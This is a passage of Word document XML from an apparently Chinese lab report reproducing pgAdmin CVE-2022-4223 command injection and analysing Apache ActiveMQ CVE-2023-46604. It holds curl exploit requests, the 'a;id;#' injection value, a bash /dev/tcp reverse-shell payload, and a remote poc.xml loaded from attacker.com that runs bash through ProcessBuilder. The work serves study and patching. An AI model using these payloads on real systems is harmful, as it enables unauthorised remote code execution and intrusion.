        <w:t xml:space="preserve">    return jsonify({'success': True, 'result': result.stdout + result.stderr})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00EAFF41" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
        </w:rPr>
        <w:t>（2）命令注入原理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524F0CAC" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>由于utility_path被直接拼接到Shell命令字符串中，且使用了shell=True参数，攻击者可以通过分号";"闭合原命令，再注入任意命令。典型Payload如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA5F4D5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{"utility_path": "a";id;#"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AE6639" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:t>拼接后的命令为："a";id;#" --version。Shell解析时：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17946031" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:t>① "a" 被当作一个命令执行（报错但不影响后续）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323AF638" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:t>② 分号";"作为命令分隔符，随后执行id命令；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B048196" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>③ "#"将后续的" --version注释掉，避免语法错误。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EC16A9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lastRenderedPageBreak/>
        <w:t>最终id命令的输出会被包含在接口响应中，攻击者可直接看到执行结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2E0996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（3）CSRF Token获取与未授权访问</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5332C889" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>虽然该接口需要CSRF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Token，但pgAdmin的</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>login页面在未登录状态下也会返回有效的CSRF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Token和Session</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ID。攻击者只需先GET</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>login获取这两个值，再携带它们发送POST请求即可，无需实际登录</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>这也是该漏洞被称为"无授权"RCE的原因。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E441226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4.4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>实验环境</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74792899" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>靶机：Vulhub</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pgAdmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> CVE-2022-4223环境，监听端口5050</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67176BE4" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>攻击机：Kali Linux，安装curl、Burp Suite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089302D7" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.5 </w:t>
      </w:r>
      <w:r>
        <w:t>漏洞复现步骤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE0B2FF" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
        </w:rPr>
        <w:t>步骤一：获取CSRF Token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693F9FA6" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>发送GET请求到/login页面，从响应头的Set-Cookie中获取pga4_session，从响应体JSON中获取csrf_token：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DC9A4A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-i "http://192.168.1.100:5050/login"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5217F3CE" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
        </w:rPr>
        <w:t>步骤二：发送命令注入Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF10764" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>将获取到的session和csrf token填入以下请求，执行id命令：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B57432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-i -X POST "http://192.168.1.100:5050/misc/validate_binary_path" \</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  -H "Content-Type: application/json" \</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  -H "X-pgA-CSRFToken: &lt;csrf-token&gt;" \</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  -H "Cookie: pga4_session=&lt;session-id&gt;" \</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  -d '{"utility_path":"a;id;#"}' </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14379F86" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>响应体中将包含uid=0(root) gid=0(root) groups=0(root)等id命令输出。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EF86BC" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
        </w:rPr>
        <w:t>步骤三：反弹Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6410B6D5" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>将id替换为反弹Shell命令即可获取交互式Shell：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7042EFBA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{"utility_path":"a;bash -i &gt;&amp; /dev/tcp/192.168.1.200/12345 0&gt;&amp;1;#"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F3B76B" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.6 </w:t>
      </w:r>
      <w:r>
        <w:t>修复建议</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD05FA8" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:t>① 升级至pgAdmin 6.17及以上版本，官方对utility_path参数增加了路径合法性校验，禁止包含分号等特殊字符。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F29D6D" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:t>② 使用subprocess.run()时避免shell=True，改用参数列表形式传递命令，从根本上防止命令注入。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348E3FEE" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>③ 为</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>pgAdmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>配置强密码并限制5050端口的访问来源，避免管理界面暴露到公网。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5037656D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783AE9E0" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>第五章</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  Apache</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ActiveMQ OpenWire</w:t>
      </w:r>
      <w:r>
        <w:t>协议反序列化</w:t>
      </w:r>
      <w:r>
        <w:t>RCE</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>CVE-2023-46604</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072B2A11" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.1 </w:t>
      </w:r>
      <w:r>
        <w:t>漏洞概述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF9930A" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Apache ActiveMQ是Apache</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>基金会旗下的开源消息中间件，支持JMS、集群、Spring</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Framework集成等特性，广泛应用于企业级异步通信场景。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>OpenWire</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>协议是ActiveMQ的原生二进制协议，用于多语言客户端与服务端之间的通信。在ActiveMQ 5.18.2及以前版本中，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>OpenWire</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>协议在处理</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ExceptionResponse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>等数据结构时，存在一处不安全的反射实例化漏洞，攻击者可通过构造恶意的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>OpenWire</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>协议数据包，实例化类路径上的任意类，最终实现远程命令执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8A9757" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.2 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>影响版本</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="01DC9AA2" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>Apache ActiveMQ &lt; 5.15.16、&lt; 5.16.7、&lt; 5.17.6、&lt; 5.18.3（即5.18.2及以前所有版本）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0724EAE8" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.3 </w:t>
      </w:r>
      <w:r>
        <w:t>代码级成因剖析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5486A6" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
        </w:rPr>
        <w:t>（1）OpenWire协议与Marshaller机制</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBE59E5" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>ActiveMQ的OpenWire协议采用自定义的二进制序列化格式。每种数据结构类型（如ConnectionInfo、Message、ExceptionResponse等）都有对应的DataStreamMarshaller实现类，负责该类型的序列化（marshal）与反序列化（unmarshal）。服务端根据数据包中的DATA_STRUCTURE_TYPE字段选择对应的Marshaller进行处理。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508BA1B6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OpenWire 协议数据包头格式（简化）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>+------------------+------------------+---------------------------+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>|  Command Type    |  Command ID     |  具体数据字段              |</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>|  (1 byte)        |  (4 bytes)      |  (变长)                    |</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>+------------------+------------------+---------------------------+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>// ExceptionResponse 的 type = 0x1F (31)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C79A90" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
        </w:rPr>
        <w:t>（2）核心漏洞点：createThrowable()方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8138D0" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>漏洞的核心位于BaseDataStreamMarshaller类的createThrowable()方法中。该方法用于在反序列化异常对象时，根据类名字符串创建Throwable实例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6D6DBC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org.apache.activemq.openwire.v9.BaseDataStreamMarshaller</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>private Throwable createThrowable(String className, String message) {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    try {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        // 直接使用攻击者控制的className加载类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        Class&lt;?&gt; clazz = Class.forName(className, false, getClassLoader());</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        // 获取接受String参数的构造器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        Constructor&lt;?&gt; constructor = clazz.getConstructor(String.class);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        // 实例化对象，message同样可控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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        return (Throwable) constructor.newInstance(message);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    } catch (Throwable e) {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        return IOException("Failed to build exception: " + className, e);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3017ADE6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可以看到，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>className</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>和message两个参数完全来自网络数据包，未做任何校验。</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Class.forName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>()会加载攻击者指定的任意类，随后通过反射调用其String构造器进行实例化。这意味着只要类路径上存在一个带有String构造器、且构造器中能触发命令执行的类，攻击者就能实现RCE。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177719EA" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
        </w:rPr>
        <w:t>（3）触发路径：ExceptionResponseMarshaller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F29D2D0" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>createThrowable()方法由ExceptionResponseMarshaller的looseUnmarshal()和tightUnmarshal()方法调用。当服务端收到类型为ExceptionResponse（type=0x1F）的OpenWire数据包时，会自动调用ExceptionResponseMarshaller进行反序列化，进而触发createThrowable()。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1289673B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ExceptionResponseMarshaller.looseUnmarshal() 简化示意</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>public DataStructure looseUnmarshal(DataInput dataIn) throws IOException {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    ExceptionResponse info = new ExceptionResponse();</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    // ... 读取其他字段 ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    if (dataIn.readBoolean()) {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        String className = looseUnmarshalString(dataIn);  // 攻击者控制的类名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        String message = looseUnmarshalString(dataIn);    // 攻击者控制的消息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        info.setException(createThrowable(className, message));  // 触发漏洞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 xml:space="preserve">    return info;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4A0AF7" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
        </w:rPr>
        <w:t>（4）利用链：ClassPathXmlApplicationContext</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9378F9" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>实际利用中，攻击者通常选择Spring框架的ClassPathXmlApplicationContext类作为目标。该类的String构造器会接收一个XML配置文件路径（支持HTTP URL），并在实例化过程中加载并解析该XML配置。如果XML中配置了MethodInvokingFactoryBean或SpEL表达式，即可在加载时执行任意命令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5794E117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攻击者控制的 className 和 message</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>className = "org.springframework.context.support.ClassPathXmlApplicationContext"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>message  = "http://attacker.com/poc.xml"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// poc.xml 内容示例</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>&lt;beans xmlns="http://www.springframework.org/schema/beans"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  &lt;bean id="rce" class="java.lang.ProcessBuilder" init-method="start"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    &lt;constructor-arg&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">      &lt;list&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        &lt;value&gt;bash&lt;/value&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        &lt;value&gt;-c&lt;/value&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
